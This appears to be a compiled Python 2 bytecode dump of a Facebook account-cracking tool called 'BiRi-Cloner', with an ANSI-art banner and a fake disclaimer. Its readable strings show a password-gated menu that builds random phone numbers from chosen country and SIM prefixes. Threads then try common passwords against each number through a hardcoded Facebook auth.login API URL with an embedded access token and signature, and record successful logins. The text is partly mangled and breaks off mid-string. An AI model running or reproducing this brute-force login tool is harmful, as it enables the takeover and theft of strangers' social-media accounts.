\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\n\x1b[1;91m \xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m\xe2\x9e\xa3 Modified By : \xf0\x9f\x92\x97 BiRi_B@B@ \xf0\x9f\x92\x97\n\x1b[1;91m\xe2\x9e\xa3 CYBER NAME : \xf0\x9f\x92\xa3BiRi-Cloner \xf0\x9f\x92\xa3\n\x1b[1;93m\xe2\x9e\xa3 WHATSAPP NO : \xf0\x9f\x91\xac prem korba? \xf0\x9f\x91\xac\n\x1b[1;95m\xe2\x9e\xa3 WARNING : \xf0\x9f\x9a\xac BiRi is injurious to health\xf0\x9f\x94\xab\n\x1b[1;96m\xe2\x9e\xa3 FUNNY LINE : \xf0\x9f\x99\x89Birier put** dis\xf0\x9f\xa4\xad\n\x1b[1;97m\xe2\x9e\xa3 NOTE : \xf0\x9f\x92\x95USE Mobile data for better success\xf0\x9f\x92\x95\n\x1b[1;92m\xe2\x9e\xa3 NOTE : \xf0\x9f\x91\x8fUSE FAST 4G SIM NET\xf0\x9f\x91\x8f\n\x1b[1;91m\xe2\x9e\xa3 NOTE : \xf0\x9f\x8c\x8d 1ST Bishmillah Boila nen\xf0\x9f\x8c\x8d\n\x1b[1;95m\xe2\x9e\xa3 ALL COUNTIRS: \xf0\x9f\x8c\xb7 Choose Your 3 Password \xf0\x9f\x8c\xb7\n\x1b[1;93m\xe2\x9e\xa3 DISCLAMIAR : \xf0\x9f\x91\x8aDON,T USE ILLIGAL WAY\xf0\x9f\x91\x8a\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\x1b[1;91m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\x1b[1;92m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;93m ALLWAYS BE HAPPY \x1b[1;92m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;93m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;96m STAY WITH THBD\x1b[1;93m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;94m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;95m PRAY FOR ME \x1b[1;94m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;95m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\x1b[1;93m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\n s\x08\x00\x00\x00birib@b@c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sk\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00}\x00\x00|\x00\x00t\x04\x00k\x02\x00r4\x00t\x05\x00\x83\x00\x00\x01n3\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x03\x00|\x00\x00\x17d\x04\x00\x17GHt\x06\x00j\x07\x00d\x05\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00NR(\x00\x00\x00s\x17\x00\x00\x00\x1b[1;97mUSERNAME TOOL : s\x17\x00\x00\x00\x1b[1;93mUSERNAME TOOL : s\x16\x00\x00\x00 [\x1b[1;91mWRONG\x1b[1;95m]i\x01\x00\x00\x00(\t\x00\x00\x00R\x06\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00logot\t\x00\x00\x00raw_inputt\x04\x00\x00\x00cusrt\x01\x00\x00\x00pR\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00u(\x01\x00\x00\x00t\x03\x00\x00\x00usr(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R.\x00\x00\x00\xb0\x00\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x05\x01\x0c\x01\x0c\x01\n\x02\r\x01\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00su\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHt\x03\x00d\x03\x00\x83\x01\x00}\x00\x00|\x00\x00t\x04\x00k\x02\x00r9\x00t\x05\x00\x83\x00\x00\x01n8\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x04\x00GHd\x05\x00|\x00\x00\x17d\x06\x00\x17GHt\x06\x00j\x07\x00d\x07\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01d\x00\x00S(\x08\x00\x00\x00NR(\x00\x00\x00s7\x00\x00\x00\x1b[1;91mUSERNAME TOOL : birib@b@ [\x1b[1;92mCORRECT\x1b[1;97m]s\x17\x00\x00\x00\x1b[1;96mPASSWORD TOOL : s7\x00\x00\x00\x1b[1;92mUSERNAME TOOL : b@b@biri [\x1b[1;92mCORRECT\x1b[1;97m]s\x17\x00\x00\x00\x1b[1;91mPASSWORD TOOL : s\x16\x00\x00\x00 [\x1b[1;91mWRONG\x1b[1;97m]i\x01\x00\x00\x00(\t\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00t\x04\x00\x00\x00cpwdR \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R-\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00pwd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R-\x00\x00\x00\xbc\x00\x00\x00s\x18\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x02\r\x01\x05\x01\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHd\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR(\x00\x00\x00s7\x00\x00\x00\x1b[1;93mUSERNAME TOOL : birib@b@ [\x1b[1;92mCORRECT\x1b[1;97m]s7\x00\x00\x00\x1b[1;96mPASSWORD TOOL : birib@b@ [\x1b[1;92mCORRECT\x1b[1;97m]i\x01\x00\x00\x00(\x06\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x04\x00\x00\x00menu(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R \x00\x00\x00\xcb\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x05\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s;\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00\x01t\x03\x00d\x03\x00\x83\x01\x00\x01t\x03\x00d\x04\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR(\x00\x00\x00s>\x00\x00\x00 \x1b[1;97m[\x1b[1;92m01\x1b[1;93m] Start Crack Random Number Countrys)\x00\x00\x00 \x1b[1;97m[\x1b[1;92m02\x1b[1;95m] Update Toolss!\x00\x00\x00 \x1b[1;97m[\x1b[1;92m00\x1b[1;96m] Exit(\x05\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R"\x00\x00\x00t\x03\x00\x00\x00avs(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R2\x00\x00\x00\xd5\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\r\x01\x05\x01\n\x01\n\x01\n\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s$\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xe1\x01|\x00\x00d\x04\x00k\x02\x00s?\x00|\x00\x00d\x05\x00k\x02\x00r7\x01t\x02\x00j\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x08\x00GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x18\x00GHd\x08\x00GHyU\x00t\x00\x00d\x19\x00\x83\x01\x00\x89\x03\x00t\x00\x00d\x1a\x00\x83\x01\x00\x89\x04\x00d\x1b\x00}\x01\x00x0\x00t\x05\x00|\x01\x00d\x1c\x00\x83\x02\x00j\x06\x00\x83\x00\x00D]\x19\x00}\x02\x00t\x07\x00j\x08\x00|\x02\x00j\t\x00\x83\x00\x00\x83\x01\x00\x01q\xec\x00WWq\x08\x02\x04t\n\x00k\n\x00r3\x01\x01\x01\x01d\x1d\x00GHt\x00\x00d\x1e\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01q\x08\x02Xn\xd1\x00|\x00\x00d\x1f\x00k\x02\x00sO\x01|\x00\x00d \x00k\x02\x00r\xda\x01t\x02\x00j\x03\x00d\x06\x00\x83\x01\x00\x01t\x0c\x00GHt\r\x00d!\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d"\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d#\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d$\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d%\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d&\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d\x06\x00\x83\x01\x00\x01t\r\x00d\'\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d(\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01n.\x00|\x00\x00d)\x00k\x02\x00s\xf2\x01|\x00\x00d*\x00k\x02\x00r\xfc\x01t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d+\x00GHd,\x00GHd-\x00GHt\x00\x00d.\x00\x83\x01\x00\x89\x00\x00t\x00\x00d/\x00\x83\x01\x00\x89\x01\x00t\x00\x00d0\x00\x83\x01\x00\x89\x02\x00d+\x00GHt\x11\x00t\x12\x00t\x07\x00\x83\x01\x00\x83\x01\x00}\x03\x00t\r\x00d1\x00|\x03\x00\x17\x83\x01\x00\x01t\x0e\x00j\x0f\x00d2\x00\x83\x01\x00\x01t\r\x00d3\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d2\x00\x83\x01\x00\x01t\r\x00d4\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d2\x00\x83\x01\x00\x01d+\x00GH\x87\x00\x00\x87\x01\x00\x87\x02\x00\x87\x03\x00\x87\x04\x00f\x05\x00d5\x00\x86\x00\x00}\x04\x00t\x13\x00d6\x00\x83\x01\x00}\x05\x00|\x05\x00j\x14\x00|\x04\x00t\x07\x00\x83\x02\x00\x01d+\x00GHd7\x00GHd8\x00t\x11\x00t\x12\x00t\x15\x00\x83\x01\x00\x83\x01\x00\x17d9\x00\x17t\x11\x00t\x12\x00t\x16\x00\x83\x01\x00\x83\x01\x00\x17GHd:\x00GHt\x00\x00d;\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01d\x00\x00S(<\x00\x00\x00Ns4\x00\x00\x00\n[\x1b[1;93m?\x1b[1;93m]\x1b[1;96m Choose an Option : \x1b[1;95mR\x0b\x00\x00\x00s\x15\x00\x00\x00[!] Fill In Correctlyt\x01\x00\x00\x001t\x02\x00\x00\x0001R(\x00\x00\x00s2\x00\x00\x00\x1b[1;92m\xf0\x9f\x91\xacRandom sim Number Clone All Country\xf0\x9f\x91\xacs2\x00\x00\x00\x1b[1;91m-------------------------------------------s3\x00\x00\x00\x1b[1;93m\xf0\x9f\x92\x9aCHOOSE ANY COUNTRY CODE NUMBER\xf0\x9f\x92\x9a : s2\x00\x00\x00\x1b[1;95m\xf0\x9f\x92\x9aBANGLADESH\xf0\x9f\x92\x9a Country code : +880 s8\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\x9ePAKISTAN\xf0\x9f\x92\x9e Country code : +92 s5\x00\x00\x00\x1b[1;97m\xf0\x9f\x92\x97INDIA\xf0\x9f\x90\xae\xf0\x9f\x92\x97 Country code : +91 s6\x00\x00\x00\x1b[1;92m\xf0\x9f\xa5\xb0SOUDIA\xf0\x9f\xa5\xb0 County code : +966 s2\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\xb5USA\xf0\x9f\x92\xb5 County code : +1 s3\x00\x00\x00\x1b[1;93m\xf0\x9f\x91\x98INDONESIA\xf0\x9f\x91\x98 County code : +1 s4\x00\x00\x00\x1b[1;95m\xf0\x9f\x91\x94UK\xf0\x9f\x91\x94 County code : +44 s-\x00\x00\x00\x1b[1;93m\xf0\x9f\x92\x99CHOOSE ANY SIM CODE NUMBER\xf0\x9f\x92\x9a :s<\x00\x00\x00\x1b[1;95m\xf0\x9f\x92\x9dBANGLADESH\xf0\x9f\x92\x9dSIM code:(175,165,191,192,193,194,)s;\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\x97PAKISTAN\xf0\x9f\x92\x97SIM code:( 313,303,345,333,321,303,)s8\x00\x00\x00\x1b[1;97m\xf0\x9f\x92\xa5INDIA\xf0\x9f\x92\xa5SIM code:( 954,897,967,937,700,727,)s:\x00\x00\x00\x1b[1;92m\xf0\x9f\x92\x91SOUDIA\xf0\x9f\x92\x91SIM code :( 50,51,52,53,54,55,56,57,)s8\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\x9bUSA\xf0\x9f\x92\x9b SIM code :( 786,815,315,256,401,718,)s9\x00\x00\x00\x1b[1;93m\xf0\x9f\x92\x98INDONESIA\xf0\x9f\x92\x98SIM code :( 786,815,315,256,401,)s9\x00\x00\x00\x1b[1;95m\xf0\x9f\x92\x8cUK\xf0\x9f\x92\x8cSIM code:( 737,706,748,783,739,759,790,)s&\x00\x00\x00\x1b[1;96mENTER ANY Country CODE NUMBER: s"\x00\x00\x00\x1b[1;95mENTER ANY SIM CODE HERE : s\x04\x00\x00\x00.txtt\x01\x00\x00\x00rs\x12\x00\x00\x00[!] File Not Founds\t\x00\x00\x00\n[ Back ]t\x01\x00\x00\x002t\x02\x00\x00\x0002s\x1f\x00\x00\x00\x1b[1;93mSedang Update Tools ....i\x02\x00\x00\x00s\x1e\x00\x00\x00pip2 install --upgrade anggaxds.\x00\x00\x00pip2 install request && pip2 install mechanizes\x16\x00\x00\x00git pull origin mastert\x07\x00\x00\x00anggaxds\x1f\x00\x00\x00\n\n\n\x1b[1;93mTOOLS SUDAH DI UPDATEi\x01\x00\x00\x00t\x01\x00\x00\x000t\x02\x00\x00\x0000s9\x00\x00\x00\x1b[1;91m--------------------------------------------------s.\x00\x00\x00\x1b[1;92m \xf0\x9f\x92\x9e7 digit automatic BiRi clone\xf0\x9f\x92\x9es?\x00\x00\x00\x1b[1;95m Example Password \x1b[1;93m : \x1b[1;91m786786,123456,000786s2\x00\x00\x00\x1b[1;92m+ \x1b[1;93mENTER YOUR FAVOURITE Password 1 : s2\x00\x00\x00\x1b[1;93m+ \x1b[1;91mENTER YOUR FAVOURITE Password 2 : s2\x00\x00\x00\x1b[1;96m+ \x1b[1;96mENTER YOUR FAVOURITE Password 3 : s)\x00\x00\x00\x1b[1;97m[\x1b[1;92m+\x1b[1;97m] Total Numbers : g\x00\x00\x00\x00\x00\x00\xe0?s9\x00\x00\x00[\x1b[1;92m\xe2\x9c\x93\x1b[1;95m] Cracking Process Has Been Started ...s9\x00\x00\x00[\x1b[1;91m!\x1b[1;93m] To Stop Process Press CTRL Then Press zc\x01\x00\x00\x00\n\x00\x00\x00\x05\x00\x00\x00\x13\x00\x00\x00s%\x05\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy\xec\x04\x88\x00\x00}\x02\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\x02\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r\xe9\x00d\x07\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x02\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x02\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n-\x04d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00rh\x01d\x0f\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x02\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x11\x00\x17|\x02\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n\xae\x03\x88\x01\x00}\x07\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\x07\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r#\x02d\x12\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x07\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x07\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01n\xf3\x02d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00r\xa2\x02d\x13\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x07\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x14\x00\x17|\x07\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01nt\x02\x88\x02\x00}\x08\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\x08\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r]\x03d\x15\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x08\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x08\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x08\x00\x17\x83\x01\x00\x01n\xb9\x01d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00r\xdc\x03d\x16\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x08\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x17\x00\x17|\x08\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x08\x00\x17\x83\x01\x00\x01n:\x01|\x01\x00}\t\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\t\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r\x97\x04d\x18\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\t\x00\x17\x83\x01\x00\x01n\x7f\x00d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00r\x16\x05d\x19\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x1a\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\t\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00Nt\x04\x00\x00\x00biris\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=s\x0c\x00\x00\x00[Successful]s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efmt\x0c\x00\x00\x00access_tokens\'\x00\x00\x00\x1b[1;97m[\x1b[1;92mBiRi-Successful\x1b[1;92m] 